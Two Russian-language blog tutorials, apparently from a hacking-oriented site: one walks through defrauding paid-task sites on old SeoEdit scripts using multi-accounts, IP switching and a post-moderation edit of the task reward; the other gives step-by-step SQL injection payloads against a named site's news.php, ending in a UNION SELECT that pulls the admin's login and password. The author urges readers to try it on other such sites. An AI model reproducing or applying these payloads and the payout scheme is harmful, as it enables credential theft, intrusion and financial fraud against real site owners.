Баг в заданиях на буксах со скриптом SeoEdit

Баг в заданиях на буксах со скриптом SeoEdit

По комментариям в прошлом уроке я увидел одно сообщение, человек прямо сказал, что для него не понятно как строить SQL запросы и проводить саму sql инъекцию, по этому выкладываю для него и других читателей более простой вариант. В этом уроке нам знаний вообще не надо будет, просто кликать мышкой, а в конце написать цифры. Единственное, что будет самым сложным — это создать мультиаккаунт. Ну давайте начнём.

Значит первым делом нам надо найти букс, который стоит на скрипте SeoEdit, главное что бы там ещё стаяла старая версия скрипта, поскольку в новых баг заделан уже. Ну если найдёте такие то вам повезёт.

Теперь как нашли, регистрируем там аккаунт.

После регистрации заходим на почту и ишем письмо с пролями. Как нашли заходим к себе в аккаунт.

Войдя в аккаунт мы должны получить себе на баланс 10 рублей, поскольку нам они понадобятся. Есть 2 варианта: пополнит баланс и заработать.
После того как деньги появились у вас на счёте идём и размещаем задание.

Ну после этого нажимаем сохранить задание и всё.

После того как мы разместили оно должно пройти модерацию, а оно пройдёт, ну просто пользователь занимается благотворительностью.
Пока оно не прошло там будет вот такой значёк.

Ну а когда администратор уже одобрит задание то значёк станет вот такой.

Ну ещё может быть такая ситуация, когда админ ставит в админке автоматическую модерацию ну и все задания сразу одобрены.

Ну в общем после того как вы получили одобрение берите и пополняйте баланс на минимальную сумму. Она 10 рублей, но иногда бывают и 1, но в основном 10.

Ну после пополнения уже никаих модераций нет и надо сделть ещё один шаг.

После того как пополнили идём в раздел управления своей рекламой и там запускаем рекламную площадку.

Всё теперь нам этот аккаунт больше не надо, хотя нет, надо будет только в конце, так что пароли не выкидывайте, но на несколько следующих шагов он не надо, по этому жмём выход.

Далее нам требуется создть второй аккаунт. Рекомендую делать это через другой браузер и советую глянуть как создать мультиаккаунт. После того как создали в профиле укажите свой кошель на который будете скидывать деньги. После того как заполнили профиль идём дальше.

После того как вы всё сделали лезем в раздел, где выполняют задания и ищем своё задание там.

Ну после того как нашли нажимем на него и идём далее.

Теперь вы должны отправить отчёт о выполнении задания.

Ну вот и все действия со вторым аккаунтом, единственное что надо будет нам от него — это вывести деньги.

Далее опять меняем ip адрес у себя на компе, инструкцию я выше писал, там есть про смену ip.

После смены ip лезем в наш первый аккаунт и лезем в раздел управления рекламой и там тыкаем на задания.

Вот это вы увидите и перед тем как одобрить нам надо будет нажать редактирование задания, справа, там где листик с карандашом.

На открывшейся странице мы видим, что можно редактировать и мы меняем сумму вознагрождения на нужную, желательно больше 10 рублей, что бы отбить свои деньги.

После того как мы изменили сумму вознагрождения нажимаем на сохранить.

Ну после того как сохранили открываем опять управление рекламой. Теперь мы видим прикольные цифры в вознагрождении, ну вообще там то что мы написали, но админа порадуем. am

Ну а теперь надо жмякнуть и проверить выполнения и одобрить его только своему второму аккаунту, а после одобрения можете удалять задание.

Всё после этого выкидываем свой первый аккаунт. Далее закрываем его, потом опять меняем браузер и ip ну и после всех этих действий заходим во второй аккаунт и видим.

Всё дело осталось только за тем, что бы вывести деньги. У себя я специально сделал такую сумму, что бы мне никто ничего не давал и мой аккаунт просто заблокировали. Это я делал только с целью новой статьи на сайт и позлить админа школьника.

Хочу заметить данный баг работает только в старых версиях SeoEdit. Также отмечу, что на Seosprint он не работает.

В общем комментируйте.

SQL инъекция на буксе в комментариях

SQL инъекция на буксе в комментариях

Вот я обещал выложить материал по SQL инъекцие, так вот получайте. Подопытным кроликом у нас будет обычный Гбукс, ну или гавно-букс, в общем его сейчас жестоко покараем, что бы другие их и не открывали.
И так для начала нам надо проверить, как же фильтруется id на странице новостей на буксе и вообще фильтруется ли. Проверим, идём к примеру по адресу

Пример: http://5b-u-x.com/news.php?id=pizda

Как узнать можно ли замутить инъекцию?
Значит идём в новости, там видим адрес
http://5b-u-x.com/47-new.html и вот это мы теперь пробуем менять на http://5b-u-x.com/news.php?id=47
Если прокатило, то давайте идти дальше.

Проверим фильтрацию страницы, на возможность вставки инъекции.
Значит заходим в любую новость на буксе а далее к адресу добовляем ковычку ‘.
http://5b-u-x.com/news.php?id=47′ ( Если у вас не прокатит с одной то пробуйте двойную «).

После того как мы сделали это, мы не видим надписи, что такой новости просто нет, а у нас всего пустая страница, раз нам не хотят писать, что такого id нету, значит этим мы и будем пользоваться.

Для тех, кто в этом совсем не шарит даю подсказку, гуглите полный FAQ по sql инъекции, сайт должен быть antichat.
Ну а если немного шарим в sql запросах, то погнали карать Гбуксы.

Известно, что у него используется скрипт mfs 2.2, по этому взглянем в файл news.php
Там мы видим в файле вот такой запрос он даёт информацию о новости

SELECT * FROM tb_news WHERE id='$newid'

* — берёт информацию из всех строчек

теперь глянем на структуру базы данных, а именно tb_news. Там у нас 4 поля.
— date;
— id;
— newstext;
— tema.

Давайте теперь модернизируем нашу ссылку, что бы провести инъекцию.
http://5b-u-x.com/news.php?id=0′ UNION SELECT 1,2,3,4 — (после двух минусов — пробел должен быть обязательно!)

id=0 был взят спецом, потому что нам нужен id не существующей новости. А иначе ничего не выйдет. Цифры 1,2,3,4 написаны тоже спициально, с целью вбить запрос в битые поля.
Что получилось: мы видим 2 и 3

Давайте дальше будем мучить ссылку.
http://5b-u-x.com/news.php?id=0′ UNION SELECT 1,(SELECT username FROM tb_users WHERE user_status=’admin’),(SELECT password FROM tb_users WHERE user_status=’admin’),4 — ( после — опять ставим пробел, что бы всё вышло).

И результат из этого мы увидели логин и пароль администратора. Ну и получается, что с буксом можно делать почти что угодно. Кстати на момент статьи на буксе были автовыплаты.

Все деньги были возвращены администратору и указана ошибка, которую он возможно исправил.

Так что если хотите провернуть такое дело, то ищите себе другой Гбукс.